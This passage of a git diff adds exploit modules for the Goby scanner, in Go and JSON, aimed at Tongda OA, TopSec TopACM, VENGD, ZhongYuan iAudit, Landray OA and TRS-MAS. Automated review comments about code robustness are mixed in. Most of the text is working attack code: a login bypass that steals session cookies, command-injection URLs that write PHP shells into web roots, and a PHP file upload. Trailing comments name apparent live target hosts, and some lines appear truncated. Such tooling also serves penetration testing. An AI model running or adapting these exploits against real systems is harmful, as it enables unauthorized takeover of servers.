", + "VulType": [ + "命令执⾏" + ], + "Tags": [ + "命令执⾏" + ] + }, + "EN": { + "Name": "TRS-MAS testCommandExecutor.jsp Remote Command Execution", + "Product": "TRS-MAS", + "Description": "

TRS MAS is a set of universal media asset management system launched by Beijing Tors Information Technology Co., Ltd. based on the characteristics of audio and video use in the mobile Internet era. The same audio and video resources can be used for different terminal platforms, effectively saving costs. , to simplify the operation. 

There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.

", + "Recommendation": "

At present, the version affected by the vulnerability has been officially stopped updating. It is recommended to use defense devices for protection.Disable /sysinfo/testCommandExecutor.jsp path access.

", + "Impact": "

There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.

", + "VulType": [ + "Command Execution" + ], + "Tags": [ + "Command Execution" + ] + } + }, + "AttackSurfaces": { + "Application": null, + "Support": null, + "Service": null, + "System": null, + "Hardware": null + } +}` + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + nil, + nil, + )) +} \ No newline at end of file diff --git a/lib/goby/goby_pocs/Tongda OA Arbitrary User Login Vulnerability.txt b/lib/goby/goby_pocs/Tongda OA Arbitrary User Login Vulnerability.txt new file mode 100644 index 000000000..50348eb27 --- /dev/null +++ b/lib/goby/goby_pocs/Tongda OA Arbitrary User Login Vulnerability.txt @@ -0,0 +1,232 @@ +package exploits + +import ( + "git.gobies.org/goby/goscanner/goutils" + "git.gobies.org/goby/goscanner/jsonvul" + "git.gobies.org/goby/goscanner/scanconfig" + "git.gobies.org/goby/httpclient" + "regexp" + "strings" +) + +func init() { + expJson := `{ + "Name": "Tongda OA Arbitrary User Login Vulnerability", + "Description": "

Tongda OA (Office Anywhere Network Intelligent Office System) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform formed by combining with Chinese enterprise management practices.

Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.

", + "Product": "Tongda-OA", + "Homepage": "https://www.tongda2000.com/", + "DisclosureDate": "2021-05-20", + "Author": "su18@javaweb.org", + "FofaQuery": "body=\"/static/templates/2013_01/index.css/\" || body=\"javascript:document.form1.UNAME.focus()\" || body=\"href=\\\"/static/images/tongda.ico\\\"\" || body=\"\" || (body=\"OA提示:不能登录OA\" && body=\"紧急通知:今日10点停电\") || title=\"Office Anywhere 2013\" || title=\"Office Anywhere 2015\" || (body=\"tongda.ico\" && (title=\"OA\" || title=\"办公\")) || body=\"class=\\\"STYLE1\\\">新OA办公系统\"", + "GobyQuery": "body=\"/static/templates/2013_01/index.css/\" || body=\"javascript:document.form1.UNAME.focus()\" || body=\"href=\\\"/static/images/tongda.ico\\\"\" || body=\"\" || (body=\"OA提示:不能登录OA\" && body=\"紧急通知:今日10点停电\") || title=\"Office Anywhere 2013\" || title=\"Office Anywhere 2015\" || (body=\"tongda.ico\" && (title=\"OA\" || title=\"办公\")) || body=\"class=\\\"STYLE1\\\">新OA办公系统\"", + "Level": "3", + "Impact": "

Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.

", + "Recommendation": "

Please follow the manufacturer's website to update it in time. https://www.tongda2000.com/

", + "References": [ + "https://fofa.so/" + ], + "Is0day": true, + "HasExp": true, + "ExpParams": [], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "Tags": [ + "Login Bypass" + ], + "VulType": [ + "Login Bypass" + ], + "CVEIDs": [ + "" + ], + "CNNVD": [ + "" + ], + "CNVD": [ + "" + ], + "CVSSScore": "9.0", + "Translation": { + "CN": { + "Name": "通达 OA 任意用户登陆漏洞", + "Product": "通达-OA", + "Description": "

通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。

通达存在任意用户登陆漏洞,攻击者可以通过指定接口登陆任意用户,获取后台管理权限,直接登录后台进行敏感操作。

", + "Recommendation": "

请联系官方厂商进行更新。https://www.tongda2000.com/

", + "Impact": "

通达存在任意用户登陆漏洞,攻击者可以通过指定接口登陆任意用户,获取后台管理权限,直接登录后台进行敏感操作。

", + "VulType": [ + "登录绕过" + ], + "Tags": [ + "登录绕过" + ] + }, + "EN": { + "Name": "Tongda OA Arbitrary User Login Vulnerability", + "Product": "Tongda-OA", + "Description": "

Tongda OA (Office Anywhere Network Intelligent Office System) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform formed by combining with Chinese enterprise management practices.

Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.

", + "Recommendation": "

Please follow the manufacturer's website to update it in time. https://www.tongda2000.com/

", + "Impact": "

Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.

", + "VulType": [ + "Login Bypass" + ], + "Tags": [ + "Login Bypass" + ] + } + }, + "AttackSurfaces": { + "Application": null, + "Support": null, + "Service": null, + "System": null, + "Hardware": null + } +}` + + checkIsTongdaOA1231234 := func(host *httpclient.FixUrl) bool { + requestConfig := httpclient.NewGetRequestConfig("/inc/expired.php") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "tongda") + } + return false + } + + getTongdaCodeUID435345 := func(host *httpclient.FixUrl) string { + requestConfig := httpclient.NewGetRequestConfig("/ispirit/login_code.php") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + if resp.StatusCode == 200 && strings.Contains(resp.RawBody, "\"codeuid\"") { + return regexp.MustCompile(`\{"codeuid":"\{(.*?)}"`).FindStringSubmatch(resp.RawBody)[1] + } + } + return "" + } + + getTongdaPHPSESSID4564234 := func(codeuid string, host *httpclient.FixUrl) string { + requestConfig := httpclient.NewPostRequestConfig("/logincheck_code.php") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Header.Store("Content-type", "application/x-www-form-urlencoded") + requestConfig.Data = "UID=1&CODEUID=_PC{" + codeuid + "}" + + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + if resp.StatusCode == 200 && strings.Contains(resp.RawBody, "\"status\":1") && strings.Contains(resp.RawBody, "\"url\":\"general") && strings.Contains(resp.HeaderString.String(), "Set-Cookie: PHPSESSID=") { + return regexp.MustCompile(`Set-Cookie: PHPSESSID=(.*?);`).FindStringSubmatch(resp.HeaderString.String())[1] + } + } + return "" + } + + exploitTongda45321 := func(phpsessionid string, host *httpclient.FixUrl) bool { + // 攻击 URL + 
requestConfig := httpclient.NewGetRequestConfig("/general/") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Timeout = 15 + requestConfig.Header.Store("Cookie", "PHPSESSID="+phpsessionid) + + // 发送攻击请求 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + return resp.StatusCode == 302 && strings.Contains(resp.Utf8Html, "tongdainfo") + } + return false + } + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { + if checkIsTongdaOA1231234(u) { + codeuid := getTongdaCodeUID435345(u) + if codeuid != "" { + phpsessionid := getTongdaPHPSESSID4564234(codeuid, u) + if phpsessionid != "" { + return exploitTongda45321(phpsessionid, u) + } + } + } + + return false + }, + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { + + if checkIsTongdaOA1231234(expResult.HostInfo) { + codeuid := getTongdaCodeUID435345(expResult.HostInfo) + if codeuid != "" { + phpsessionid := getTongdaPHPSESSID4564234(codeuid, expResult.HostInfo) + if phpsessionid != "" { + if exploitTongda45321(phpsessionid, expResult.HostInfo) { + expResult.Success = true + expResult.Output = "登陆成功,使用如下 session 即可登陆:" + phpsessionid + } + } + } + } + + return expResult + }, + )) +} + +// http://14.18.236.21:8000/ \ No newline at end of file diff --git a/lib/goby/goby_pocs/TopSec_TopACM_Remote_Command_Execution.txt b/lib/goby/goby_pocs/TopSec_TopACM_Remote_Command_Execution.txt new file mode 100644 index 000000000..ab95cac74 --- /dev/null +++ b/lib/goby/goby_pocs/TopSec_TopACM_Remote_Command_Execution.txt 
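Review bot: `getTongdaCodeUID435345` and `getTongdaPHPSESSID4564234` both index `FindStringSubmatch(...)[1]` without checking that the pattern matched, so a body that contains `"codeuid"` in a different shape, or a `Set-Cookie: PHPSESSID=` header with no trailing `;`, makes the call return nil and the index panics the whole scanner rather than failing this one check. Guard the result, `m := re.FindStringSubmatch(s); if len(m) < 2 { return "" }; return m[1]`, and compile both patterns once at package scope instead of on every call. `ExploitSteps` in `expJson` carries a request with an empty `uri` while the real logic is in the Go callbacks; a one-line comment above `expJson` saying the JSON steps are placeholders for the callbacks would spare the next reader a false lead. The trailing comment holding a host URL at the end of the file looks like a leftover test target and should be dropped before merge.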
@@ -0,0 +1,77 @@ +package exploits + +import ( + "git.gobies.org/goby/goscanner/goutils" + "git.gobies.org/goby/goscanner/jsonvul" + "git.gobies.org/goby/goscanner/scanconfig" + "git.gobies.org/goby/httpclient" + "net/url" + "strings" +) + +func init() { + expJson := `{"Name":"TopSec TopACM Remote Command Execution","Description":"

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Product":"TopSec-TopACM","Homepage":"https://www.topsec.com.cn/product/27.html","DisclosureDate":"2022-07-28","Author":"su18@javaweb.org","FofaQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","GobyQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","Level":"3","Impact":"

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Recommendation":"

At present, the manufacturer has not released a security patch. Please pay attention to the official update.https://www.topsec.com.cn/product/27.html

","References":["https://mp.weixin.qq.com/s/5UMEIrDiG5hQFofByYH78g"],"Is0day":false,"HasExp":true,"ExpParams":[{"name":"cmd","type":"input","value":"echo%20PD9waHAgcGhwaW5mbygpOw==%20|base64%20-d%20%3E/var/www/html/3.php","show":""}],"ExpTips":{"Type":"","Content":""},"ScanSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":false,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"ExploitSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":true,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"Tags":["Command Execution"],"VulType":["Command Execution"],"CVEIDs":[""],"CNNVD":[""],"CNVD":[""],"CVSSScore":"9.8","Translation":{"CN":{"Name":"天融信上网行为管理系统命令执行","Product":"天融信-上网行为管理系统","Description":"

天融信上网行为管理系统(TopACM)综合考虑各行业客户需求,为客户提供安全策略、链路负载、身份认证、流量管理、行为管控、上网审计、日志追溯、网监对接、用户行为分析、VPN等实用功能。产品具有良好的网络适应性并满足《网络安全法》、公安部151号令、等保2.0等关于用户行为审计和日志留存的相关要求。目前产品广泛应用于政府、教育、能源、企业、运营商等各类行业,协助客户规范网络、提高工作效率、挖掘数据价值。

天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。

","Recommendation":"

目前厂商还未发布安全补丁,请关注官方更新。https://www.topsec.com.cn/product/27.html

","Impact":"

天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。

","VulType":["命令执⾏"],"Tags":["命令执⾏"]},"EN":{"Name":"TopSec TopACM Remote Command Execution","Product":"TopSec-TopACM","Description":"

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Recommendation":"

At present, the manufacturer has not released a security patch. Please pay attention to the official update.https://www.topsec.com.cn/product/27.html

","Impact":"

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","VulType":["Command Execution"],"Tags":["Command Execution"]}},"AttackSurfaces":{"Application":null,"Support":null,"Service":null,"System":null,"Hardware":null}}` + + exploitTopACM092348783482 := func(cmd string, host *httpclient.FixUrl) bool { + // 攻击 URL + requestConfig := httpclient.NewGetRequestConfig("/view/IPV6/naborTable/static_convert.php?blocks[0]=|%20" + url.QueryEscape(cmd)) + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Timeout = 15 + + // 发送攻击请求 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "ip -6 neigh del") { + return true + } + } + return false + } + + checkExistFileTopACM092348783482 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool { + // 攻击 URL + requestConfig := httpclient.NewGetRequestConfig("/" + fileName + ".php") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Timeout = 15 + + // 发送攻击请求 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent) { + return true + } + } + return false + } + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { + + // 生成随机文件名 + randomFileName := goutils.RandomHexString(6) + + // 漏洞攻击包,POC 使用自删除的文件 + // /var/www/html/"+randomFileName+".php", u) { + return checkExistFileTopACM092348783482(randomFileName, "e165421110ba03099a1c0393373c5b43", u) + } + + return false + }, + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { + + cmd := ss.Params["cmd"].(string) + + if exploitTopACM092348783482(cmd, expResult.HostInfo) { + expResult.Success = true + expResult.Output = "命令执行成功" + } + + return expResult + }, + )) +} + +// https://heiwado.cn:8443/ \ No newline at end of file 
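Review bot: `cmd := ss.Params["cmd"].(string)` in the exploit callback is an unchecked type assertion, so a missing or non-string `cmd` parameter panics the scanner instead of failing this single exploit; use the two-value form, `cmd, ok := ss.Params["cmd"].(string); if !ok || cmd == "" { return expResult }`. The same pattern appears as `ss.Params["Cmd"].(string)` in the ZhongYuan iAudit file later in this commit. The line `// /var/www/html/"+randomFileName+".php", u) {` appears truncated in this rendering, so the call that feeds `checkExistFileTopACM092348783482` cannot be verified here; please confirm the committed file is intact. The PoC callback writes a file into the target web root during the scan phase (the comment says it self-deletes), which is state-changing and should be stated in `ExpTips` so operators know the check leaves entries in the target's web-server logs and, if the self-delete fails, a file on disk. The trailing comment holding a host URL at the end of the file looks like a leftover test target and should be dropped.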
diff --git a/lib/goby/goby_pocs/VENGD_Arbitrary_File_Upload_variant.json b/lib/goby/goby_pocs/VENGD_Arbitrary_File_Upload_variant.json new file mode 100644 index 000000000..285d63013 --- /dev/null +++ b/lib/goby/goby_pocs/VENGD_Arbitrary_File_Upload_variant.json 
@@ -0,0 +1,161 @@
+{
+ "Name": "VENGD Arbitrary File Upload",
+ "Level": "3",
+ "Tags": [
+ "getshell"
+ ],
+ "GobyQuery": "title=\"和信下一代云桌面VENGD\"",
+ "Description": "和信创天云桌面系统存在任意文件上传",
+ "Product": "VENGD",
+ "Homepage": "https://www.vesystem.com/products/3",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://blog.csdn.net/weixin_44146996/article/details/115611026"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "Name": "FileContent",
+ "Type": "input",
+ "Value": "<?php phpinfo(); ?>"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/Upload/upload_file.php?l=test",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv"
+ },
+ "data_type": "text",
+ "data": "------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\nContent-Type: image/avif\n\n\n------WebKitFormBoundaryfcKRltGv--",
+ "set_variable": [
+ "str1|rand|str|7",
+ "r1|rand|int|8"
+ ]
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ },
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Upload/test/{{{r1}}}.php",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "{{{str1}}}",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/Upload/upload_file.php?l=test",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv"
+ },
+ "data_type": "text",
+ "data": "------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\nContent-Type: image/avif\n\n{{{FileContent}}}\n------WebKitFormBoundaryfcKRltGv--",
+ "set_variable": [
+ "r1|rand|int|8"
+ ]
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ },
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Upload/test/{{{r1}}}.php",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|define|text|/Upload/test/{{{r1}}}.php"
+ ]
+ }
+ ],
+ "PostTime": "2021-12-09 13:55:04",
+ "GobyVersion": "1.9.310"
+}
\ No newline at end of file
diff --git a/lib/goby/goby_pocs/ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.txt b/lib/goby/goby_pocs/ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.txt
new file mode 100644
index 000000000..f2e867f63
--- /dev/null
+++ b/lib/goby/goby_pocs/ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.txt
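Review bot: `Impact` and `Recommendation` are empty strings, so a finding from this PoC reaches the report with no remediation guidance; `Recommendation` should at least point to the vendor page already given in `Homepage` and advise restricting `/Upload/upload_file.php` to authenticated users and non-executable file types. In `ScanSteps`, `str1` is generated (`str1|rand|str|7`) but never placed in the upload body, so the second check `"operation": "contains", "value": "{{{str1}}}"` can never match as written; either remove the unused variable together with that check or make the step verify what it actually uploaded. Both phases leave `/Upload/test/{{{r1}}}.php` on the target with no cleanup step, which should be stated in `ExpTips` so operators know the check leaves an artifact. The second request in each phase uses `"header": null` where the others use an object; keep one form.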
@@ -0,0 +1,104 @@ +package exploits + +import ( + "fmt" + "git.gobies.org/goby/goscanner/goutils" + "git.gobies.org/goby/goscanner/jsonvul" + "git.gobies.org/goby/goscanner/scanconfig" + "git.gobies.org/goby/httpclient" + "strings" +) + +func init() { + expJson := `{ + "Name": "ZhongYuan iAudit get_luser_by_sshport.php RCE", + "Description": "ZhongYuan iAudit get_luser_by_sshport.php ,The existence of command splicing leads to remote command execution vulnerability", + "Product": "ZhongYuan iAudit", + "Homepage": "https://www.tosec.com.cn/", + "DisclosureDate": "2021-06-01", + "Author": "PeiQi", + "GobyQuery": "body=\"admin.php?controller=admin_index&action=chklogin&ref\"", + "Level": "3", + "Impact": "

The existence of command splicing leads to remote command execution vulnerability

", + "Recommendation": "", + "References": [ + "http://wiki.peiqi.tech" + ], + "HasExp": true, + "ExpParams": [ + { + "name": "Cmd", + "type": "input", + "value": "id" + } + ], + "ScanSteps": [ + "AND" + ], + "ExploitSteps": null, + "Tags": [ + "RCE" + ], + "CVEIDs": null, + "CVSSScore": "0.0", + "AttackSurfaces": { + "Application": [ + "WangKang Next generation firewall" + ], + "Support": null, + "Service": null, + "System": null, + "Hardware": null + }, + "Recommandation": "

Upgrade version

" +}` + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { + randomStr := goutils.RandomHexString(8) + ".php" + uri_1 := "/get_luser_by_sshport.php?clientip=1;echo%20'%3C%3Fphp%20system(%22id%22)%3Bunlink(__FILE__)%3F%3E'>/opt/freesvr/web/htdocs/freesvr/audit/" + randomStr + ";&clientport=1" + cfg_1 := httpclient.NewGetRequestConfig(uri_1) + cfg_1.VerifyTls = false + cfg_1.FollowRedirect = false + cfg_1.Header.Store("Content-type", "application/json") + if resp, err := httpclient.DoHttpRequest(u, cfg_1); err == nil { + if resp.StatusCode == 200 { + uri_2 := "/" + randomStr + cfg_2 := httpclient.NewGetRequestConfig(uri_2) + cfg_2.VerifyTls = false + cfg_2.FollowRedirect = false + cfg_2.Header.Store("Content-type", "application/x-www-form-urlencoded") + if resp, err := httpclient.DoHttpRequest(u, cfg_2); err == nil { + return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "uid") + } + } + } + return false + }, + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { + randomStr := goutils.RandomHexString(8) + ".php" + cmd := ss.Params["Cmd"].(string) + uri_1 := "/get_luser_by_sshport.php?clientip=1;echo%20'%3C%3Fphp%20system(%22" + cmd + "%22)%3Bunlink(__FILE__)%3F%3E'>/opt/freesvr/web/htdocs/freesvr/audit/" + randomStr + ";&clientport=1" + cfg_1 := httpclient.NewGetRequestConfig(uri_1) + cfg_1.VerifyTls = false + cfg_1.FollowRedirect = false + cfg_1.Header.Store("Content-type", "application/json") + if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_1); err == nil { + if resp.StatusCode == 200 { + uri_2 := "/" + randomStr + cfg_2 := httpclient.NewGetRequestConfig(uri_2) + cfg_2.VerifyTls = false + cfg_2.FollowRedirect = false + cfg_2.Header.Store("Content-type", "application/x-www-form-urlencoded") + if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_2); err == nil { + 
expResult.Output = resp.Utf8Html + expResult.Success = true + } + } + } + return expResult + }, + )) +} \ No newline at end of file diff --git a/lib/goby/goby_pocs/landray_oa_treexml_rce.txt b/lib/goby/goby_pocs/landray_oa_treexml_rce.txt new file mode 100644 index 000000000..afd9a3787 --- /dev/null +++ b/lib/goby/goby_pocs/landray_oa_treexml_rce.txt @@ -0,0 +1,167 @@ +package exploits + +import ( + "git.gobies.org/goby/goscanner/goutils" +) + +func init() { + expJson := `{ + "Name": "蓝凌OA treexml.tmpl 远程代码执行漏洞", + "Description": "
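Review bot: `fmt` is imported but never referenced anywhere in this file, so the Go toolchain rejects it with "imported and not used" and the PoC will not load; drop that import line. `cmd := ss.Params["Cmd"].(string)` in the exploit handler is an unchecked type assertion that panics when the parameter is absent or not a string; prefer `cmd, ok := ss.Params["Cmd"].(string)` and return `expResult` unchanged when `!ok`. The value is then spliced raw into `uri_1`, unlike the nsfocus PoC in this same commit which passes its parameter through `url.QueryEscape`, so the two handlers build their requests inconsistently. In both handlers the inner `if resp, err := httpclient.DoHttpRequest(...)` shadows the outer `resp, err`, which is legal but easy to misread; distinct names such as `resp2, err2` (as the nsfocus file does) would help.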

蓝凌OA treexml.tmpl存在远程代码执行漏洞,攻击者通过发送特定的请求包可以获取服务器权限

", + "Product": "蓝凌OA", + "Homepage": "www.landray.com.cn", + "DisclosureDate": "2022-07-18", + "Author": "", + "FofaQuery": "app=\"Landray-OA系统\"", + "GobyQuery": "app=\"Landray-OA系统\"", + "Level": "3", + "Impact": "", + "Recommendation": "", + "References": [ + "http://wiki.peiqi.tech/wiki/oa/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20treexml.tmpl%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html" + ], + "Is0day": false, + "HasExp": true, + "ExpParams": [ + { + "name": "command", + "type": "input", + "value": "whoami", + "show": "" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "method": "POST", + "uri": "/data/sys-common/treexml.tmpl", + "follow_redirect": true, + "header": { + "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", + "Accept-Encoding": "gzip, deflate", + "cmd": "echo This page has a bug", + "Accept": "*/*", + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": 
